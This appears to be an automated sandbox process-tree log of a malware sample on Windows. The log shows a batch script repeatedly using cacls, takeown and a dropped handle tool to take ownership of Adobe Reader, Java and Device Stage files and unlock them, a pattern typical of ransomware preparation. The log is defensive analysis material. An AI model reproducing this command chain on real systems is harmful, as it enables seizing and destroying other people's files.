C:\Users\Admin\AppData\Local\Temp\BtmmyzQx.exeBtmmyzQx.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:828
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\STlKWzS5.bat" "C:\Users\All Users\Microsoft\Device Stage\Task\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\it-IT\resource.xml""2⤵PID:960
-
C:\Windows\SysWOW64\cacls.execacls "C:\Users\All Users\Microsoft\Device Stage\Task\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\it-IT\resource.xml" /E /G Admin:F /C3⤵PID:928
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Users\All Users\Microsoft\Device Stage\Task\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\it-IT\resource.xml"3⤵
- Modifies file permissions
PID:1176
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c BtmmyzQx.exe -accepteula "resource.xml" -nobanner3⤵PID:1552
-
C:\Users\Admin\AppData\Local\Temp\BtmmyzQx.exeBtmmyzQx.exe -accepteula "resource.xml" -nobanner4⤵PID:1076
-
-
-
C:\Users\Admin\AppData\Local\Temp\BtmmyzQx.exeBtmmyzQx.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:228
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\STlKWzS5.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Legal\ENU\eula.ini""2⤵PID:1928
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Legal\ENU\eula.ini" /E /G Admin:F /C3⤵PID:1556
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Legal\ENU\eula.ini"3⤵PID:224
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c BtmmyzQx.exe -accepteula "eula.ini" -nobanner3⤵PID:912
-
C:\Users\Admin\AppData\Local\Temp\BtmmyzQx.exeBtmmyzQx.exe -accepteula "eula.ini" -nobanner4⤵PID:1620
-
-
-
C:\Users\Admin\AppData\Local\Temp\BtmmyzQx.exeBtmmyzQx.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:1688
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\STlKWzS5.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins\AcroSign.prc""2⤵PID:1636
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins\AcroSign.prc" /E /G Admin:F /C3⤵PID:520
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins\AcroSign.prc"3⤵PID:804
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c BtmmyzQx.exe -accepteula "AcroSign.prc" -nobanner3⤵PID:1836
-
C:\Users\Admin\AppData\Local\Temp\BtmmyzQx.exeBtmmyzQx.exe -accepteula "AcroSign.prc" -nobanner4⤵PID:1680
-
-
-
C:\Users\Admin\AppData\Local\Temp\BtmmyzQx.exeBtmmyzQx.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:1908
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\STlKWzS5.bat" "C:\Program Files\Java\jre7\bin\server\classes.jsa""2⤵PID:1152
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files\Java\jre7\bin\server\classes.jsa" /E /G Admin:F /C3⤵PID:1340
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files\Java\jre7\bin\server\classes.jsa"3⤵PID:1496
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c BtmmyzQx.exe -accepteula "classes.jsa" -nobanner3⤵PID:928
-
C:\Users\Admin\AppData\Local\Temp\BtmmyzQx.exeBtmmyzQx.exe -accepteula "classes.jsa" -nobanner4⤵PID:220
-
-
-
C:\Users\Admin\AppData\Local\Temp\BtmmyzQx.exeBtmmyzQx.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:1932
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\STlKWzS5.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\forms_distributed.gif""2⤵PID:1188
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\forms_distributed.gif" /E /G Admin:F /C3⤵PID:1060
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\forms_distributed.gif"3⤵
- Modifies file permissions
PID:1564
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c BtmmyzQx.exe -accepteula "forms_distributed.gif" -nobanner3⤵PID:1652
-
C:\Users\Admin\AppData\Local\Temp\BtmmyzQx.exeBtmmyzQx.exe -accepteula "forms_distributed.gif" -nobanner4⤵PID:1620
-
-
-
C:\Users\Admin\AppData\Local\Temp\BtmmyzQx.exeBtmmyzQx.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:432
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\STlKWzS5.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\reviews_sent.gif""2⤵PID:1968
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\reviews_sent.gif" /E /G Admin:F /C3⤵PID:1952
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\reviews_sent.gif"3⤵
- Modifies file permissions
PID:956
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c BtmmyzQx.exe -accepteula "reviews_sent.gif" -nobanner3⤵PID:1592
-
C:\Users\Admin\AppData\Local\Temp\BtmmyzQx.exeBtmmyzQx.exe -accepteula "reviews_sent.gif" -nobanner4⤵PID:2012
-
-
-
C:\Users\Admin\AppData\Local\Temp\BtmmyzQx.exeBtmmyzQx.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:1220
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\STlKWzS5.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\stop_collection_data.gif""2⤵PID:800
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\stop_collection_data.gif" /E /G Admin:F /C3⤵PID:392
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\stop_collection_data.gif"3⤵PID:972
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c BtmmyzQx.exe -accepteula "stop_collection_data.gif" -nobanner3⤵PID:1552
-
C:\Users\Admin\AppData\Local\Temp\BtmmyzQx.exeBtmmyzQx.exe -accepteula "stop_collection_data.gif" -nobanner4⤵PID:220
-
-
-
C:\Users\Admin\AppData\Local\Temp\BtmmyzQx.exeBtmmyzQx.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:228
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\STlKWzS5.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\ReadMe.htm""2⤵PID:212
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\ReadMe.htm" /E /G Admin:F /C3⤵PID:980
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\ReadMe.htm"3⤵
- Modifies file permissions
PID:224
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c BtmmyzQx.exe -accepteula "ReadMe.htm" -nobanner3⤵PID:912
-
C:\Users\Admin\AppData\Local\Temp\BtmmyzQx.exeBtmmyzQx.exe -accepteula "ReadMe.htm" -nobanner4⤵PID:1620
-
-
-
C:\Users\Admin\AppData\Local\Temp\BtmmyzQx.exeBtmmyzQx.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:1688
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\STlKWzS5.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\MinionPro-It.otf""2⤵PID:1712
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\MinionPro-It.otf" /E /G Admin:F /C3⤵PID:520
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\MinionPro-It.otf"3⤵PID:804
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c BtmmyzQx.exe -accepteula "MinionPro-It.otf" -nobanner3⤵PID:1836
-
C:\Users\Admin\AppData\Local\Temp\BtmmyzQx.exeBtmmyzQx.exe -accepteula "MinionPro-It.otf" -nobanner4⤵PID:2012
-
-
-
C:\Users\Admin\AppData\Local\Temp\BtmmyzQx.exeBtmmyzQx.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:1908
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\STlKWzS5.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\ZX______.PFB""2⤵PID:1648
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\ZX______.PFB" /E /G Admin:F /C3⤵PID:1340
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\ZX______.PFB"3⤵PID:1496
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c BtmmyzQx.exe -accepteula "ZX______.PFB" -nobanner3⤵PID:928
-
C:\Users\Admin\AppData\Local\Temp\BtmmyzQx.exeBtmmyzQx.exe -accepteula "ZX______.PFB" -nobanner4⤵PID:220
-
-
-
C:\Users\Admin\AppData\Local\Temp\BtmmyzQx.exeBtmmyzQx.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:1932
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\STlKWzS5.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\brt04.hsp""2⤵PID:240
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\brt04.hsp" /E /G Admin:F /C3⤵PID:1060
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\brt04.hsp"3⤵PID:1564
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c BtmmyzQx.exe -accepteula "brt04.hsp" -nobanner3⤵PID:1652
-
C:\Users\Admin\AppData\Local\Temp\BtmmyzQx.exeBtmmyzQx.exe -accepteula "brt04.hsp" -nobanner4⤵PID:1620
-
-
-
C:\Users\Admin\AppData\Local\Temp\BtmmyzQx.exeBtmmyzQx.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:432
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\STlKWzS5.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\engphon.env""2⤵PID:828
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\engphon.env" /E /G Admin:F /C3⤵PID:1952
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\engphon.env"3⤵
- Modifies file permissions
PID:956
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c BtmmyzQx.exe -accepteula "engphon.env" -nobanner3⤵PID:1592
-
C:\Users\Admin\AppData\Local\Temp\BtmmyzQx.exeBtmmyzQx.exe -accepteula "engphon.env" -nobanner4⤵PID:2012
-
-
-
C:\Users\Admin\AppData\Local\Temp\BtmmyzQx.exeBtmmyzQx.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:1220
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\STlKWzS5.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\Mac\CORPCHAR.TXT""2⤵PID:232
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\Mac\CORPCHAR.TXT" /E /G Admin:F /C3⤵PID:392
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\Mac\CORPCHAR.TXT"3⤵PID:972
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c BtmmyzQx.exe -accepteula "CORPCHAR.TXT" -nobanner3⤵PID:1552
-
C:\Users\Admin\AppData\Local\Temp\BtmmyzQx.exeBtmmyzQx.exe -accepteula "CORPCHAR.TXT" -nobanner4⤵PID:220
-
-
-
C:\Users\Admin\AppData\Local\Temp\BtmmyzQx.exeBtmmyzQx.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:228
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\STlKWzS5.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\win\CP1250.TXT""2⤵PID:1928
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\win\CP1250.TXT" /E /G Admin:F /C3⤵PID:1556
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\win\CP1250.TXT"3⤵
- Modifies file permissions
PID:224
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c BtmmyzQx.exe -accepteula "CP1250.TXT" -nobanner3⤵PID:912
-
C:\Users\Admin\AppData\Local\Temp\BtmmyzQx.exeBtmmyzQx.exe -accepteula "CP1250.TXT" -nobanner4⤵PID:1620
-
-
-
C:\Users\Admin\AppData\Local\Temp\BtmmyzQx.exeBtmmyzQx.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:1688
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\STlKWzS5.bat" "C:\ProgramData\Microsoft\Device Stage\Device\{8702d817-5aad-4674-9ef3-4d3decd87120}\watermark.png""2⤵PID:772
-
C:\Windows\SysWOW64\cacls.execacls "C:\ProgramData\Microsoft\Device Stage\Device\{8702d817-5aad-4674-9ef3-4d3decd87120}\watermark.png" /E /G Admin:F /C3⤵PID:520
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\ProgramData\Microsoft\Device Stage\Device\{8702d817-5aad-4674-9ef3-4d3decd87120}\watermark.png"3⤵
- Modifies file permissions
- Suspicious use of AdjustPrivilegeToken
PID:804
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c BtmmyzQx.exe -accepteula "watermark.png" -nobanner3⤵PID:1680
-
C:\Users\Admin\AppData\Local\Temp\BtmmyzQx.exeBtmmyzQx.exe -accepteula "watermark.png" -nobanner4⤵PID:1400
-
-
-
C:\Users\Admin\AppData\Local\Temp\BtmmyzQx.exeBtmmyzQx.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:1824
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\STlKWzS5.bat" "C:\ProgramData\Microsoft\Device Stage\Task\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\en-US\resource.xml""2⤵PID:1924
-
C:\Windows\SysWOW64\cacls.execacls "C:\ProgramData\Microsoft\Device Stage\Task\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\en-US\resource.xml" /E /G Admin:F /C3⤵PID:864
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\ProgramData\Microsoft\Device Stage\Task\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\en-US\resource.xml"3⤵
- Suspicious use of AdjustPrivilegeToken
PID:972
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c BtmmyzQx.exe -accepteula "resource.xml" -nobanner3⤵PID:220
-
C:\Users\Admin\AppData\Local\Temp\BtmmyzQx.exeBtmmyzQx.exe -accepteula "resource.xml" -nobanner4⤵PID:1552
-
-
-
C:\Users\Admin\AppData\Local\Temp\BtmmyzQx.exeBtmmyzQx.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:228
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\STlKWzS5.bat" "C:\Users\All Users\Microsoft\Device Stage\Task\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\de-DE\resource.xml""2⤵PID:232
-
C:\Windows\SysWOW64\cacls.execacls "C:\Users\All Users\Microsoft\Device Stage\Task\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\de-DE\resource.xml" /E /G Admin:F /C3⤵PID:1556
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Users\All Users\Microsoft\Device Stage\Task\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\de-DE\resource.xml"3⤵PID:1652
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c BtmmyzQx.exe -accepteula "resource.xml" -nobanner3⤵PID:1620
-
C:\Users\Admin\AppData\Local\Temp\BtmmyzQx.exeBtmmyzQx.exe -accepteula "resource.xml" -nobanner4⤵PID:912
-
-
-
C:\Users\Admin\AppData\Local\Temp\BtmmyzQx.exeBtmmyzQx.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:1688
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\STlKWzS5.bat" "C:\Users\All Users\Microsoft\Device Stage\Task\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\es-ES\resource.xml""2⤵PID:1928
-
C:\Windows\SysWOW64\cacls.execacls "C:\Users\All Users\Microsoft\Device Stage\Task\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\es-ES\resource.xml" /E /G Admin:F /C3⤵PID:520
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Users\All Users\Microsoft\Device Stage\Task\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\es-ES\resource.xml"3⤵PID:804
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c BtmmyzQx.exe -accepteula "resource.xml" -nobanner3⤵PID:1592
-
C:\Users\Admin\AppData\Local\Temp\BtmmyzQx.exeBtmmyzQx.exe -accepteula "resource.xml" -nobanner4⤵PID:2012
-
-
-
C:\Users\Admin\AppData\Local\Temp\BtmmyzQx.exeBtmmyzQx.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:1220
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\STlKWzS5.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins\AcroForm\adobepdf.xdc""2⤵PID:1724
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins\AcroForm\adobepdf.xdc" /E /G Admin:F /C3⤵PID:1496
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins\AcroForm\adobepdf.xdc"3⤵
- Modifies file permissions
PID:928
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c BtmmyzQx.exe -accepteula "adobepdf.xdc" -nobanner3⤵PID:1912
-
C:\Users\Admin\AppData\Local\Temp\BtmmyzQx.exeBtmmyzQx.exe -accepteula "adobepdf.xdc" -nobanner4⤵PID:1552
-
-
-
C:\Users\Admin\AppData\Local\Temp\BtmmyzQx.exeBtmmyzQx.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:892
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\STlKWzS5.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\distribute_form.gif""2⤵PID:1340
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\distribute_form.gif" /E /G Admin:F /C3⤵PID:1564
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\distribute_form.gif"3⤵
- Modifies file permissions
PID:2008
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c BtmmyzQx.exe -accepteula "distribute_form.gif" -nobanner3⤵PID:204
-
C:\Users\Admin\AppData\Local\Temp\BtmmyzQx.exeBtmmyzQx.exe -accepteula "distribute_form.gif" -nobanner4⤵PID:912
-
-
-
C:\Users\Admin\AppData\Local\Temp\BtmmyzQx.exeBtmmyzQx.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:1004
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\STlKWzS5.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\main.css""2⤵PID:980
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\main.css" /E /G Admin:F /C3⤵PID:956
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\main.css"3⤵
- Modifies file permissions
PID:1908
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c BtmmyzQx.exe -accepteula "main.css" -nobanner3⤵PID:1152
-
C:\Users\Admin\AppData\Local\Temp\BtmmyzQx.exeBtmmyzQx.exe -accepteula "main.css" -nobanner4⤵PID:2012
-
-
-
C:\Users\Admin\AppData\Local\Temp\BtmmyzQx.exeBtmmyzQx.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:800
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\STlKWzS5.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\review_shared.gif""2⤵PID:1156
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\review_shared.gif" /E /G Admin:F /C3⤵PID:664
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\review_shared.gif"3⤵PID:972
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c BtmmyzQx.exe -accepteula "review_shared.gif" -nobanner3⤵PID:220
-
C:\Users\Admin\AppData\Local\Temp\BtmmyzQx.exeBtmmyzQx.exe -accepteula "review_shared.gif" -nobanner4⤵PID:1552
-
-
-
C:\Users\Admin\AppData\Local\Temp\BtmmyzQx.exeBtmmyzQx.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:228
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\STlKWzS5.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\turnOffNotificationInAcrobat.gif""2⤵PID:392
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\turnOffNotificationInAcrobat.gif" /E /G Admin:F /C3⤵PID:1556
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\turnOffNotificationInAcrobat.gif"3⤵PID:1652
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c BtmmyzQx.exe -accepteula "turnOffNotificationInAcrobat.gif" -nobanner3⤵PID:1620
-
C:\Users\Admin\AppData\Local\Temp\BtmmyzQx.exeBtmmyzQx.exe -accepteula "turnOffNotificationInAcrobat.gif" -nobanner4⤵PID:912
-
-
-
C:\Users\Admin\AppData\Local\Temp\BtmmyzQx.exeBtmmyzQx.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:1688
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\STlKWzS5.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\CourierStd-BoldOblique.otf""2⤵PID:236
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\CourierStd-BoldOblique.otf" /E /G Admin:F /C3⤵PID:520
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\CourierStd-BoldOblique.otf"3⤵PID:804
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c BtmmyzQx.exe -accepteula "CourierStd-BoldOblique.otf" -nobanner3⤵PID:1592
-
C:\Users\Admin\AppData\Local\Temp\BtmmyzQx.exeBtmmyzQx.exe -accepteula "CourierStd-BoldOblique.otf" -nobanner4⤵PID:2012
-
-
-
C:\Users\Admin\AppData\Local\Temp\BtmmyzQx.exeBtmmyzQx.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:1220
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\STlKWzS5.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\MyriadPro-Regular.otf""2⤵PID:1712
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\MyriadPro-Regular.otf" /E /G Admin:F /C3⤵PID:1496
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\MyriadPro-Regular.otf"3⤵PID:928
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c BtmmyzQx.exe -accepteula "MyriadPro-Regular.otf" -nobanner3⤵PID:1912
-
C:\Users\Admin\AppData\Local\Temp\BtmmyzQx.exeBtmmyzQx.exe -accepteula "MyriadPro-Regular.otf" -nobanner4⤵PID:1552
-
-
-
C:\Users\Admin\AppData\Local\Temp\BtmmyzQx.exeBtmmyzQx.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:892
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\STlKWzS5.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\LanguageNames2\DisplayLanguageNames.en_GB_EURO.txt""2⤵PID:1648
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\LanguageNames2\DisplayLanguageNames.en_GB_EURO.txt" /E /G Admin:F /C3⤵PID:1564
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\LanguageNames2\DisplayLanguageNames.en_GB_EURO.txt"3⤵
- Modifies file permissions
PID:2008
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c BtmmyzQx.exe -accepteula "DisplayLanguageNames.en_GB_EURO.txt" -nobanner3⤵PID:204
-
C:\Users\Admin\AppData\Local\Temp\BtmmyzQx.exeBtmmyzQx.exe -accepteula "DisplayLanguageNames.en_GB_EURO.txt" -nobanner4⤵PID:912
-
-
-
C:\Users\Admin\AppData\Local\Temp\BtmmyzQx.exeBtmmyzQx.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:1004
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\STlKWzS5.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\can03.ths""2⤵PID:960
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\can03.ths" /E /G Admin:F /C3⤵PID:956
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\can03.ths"3⤵PID:1908
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c BtmmyzQx.exe -accepteula "can03.ths" -nobanner3⤵PID:1152
-
C:\Users\Admin\AppData\Local\Temp\BtmmyzQx.exeBtmmyzQx.exe -accepteula "can03.ths" -nobanner4⤵PID:1680
-
-
-
C:\Users\Admin\AppData\Local\Temp\BtmmyzQx.exeBtmmyzQx.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:1592
-
-
-
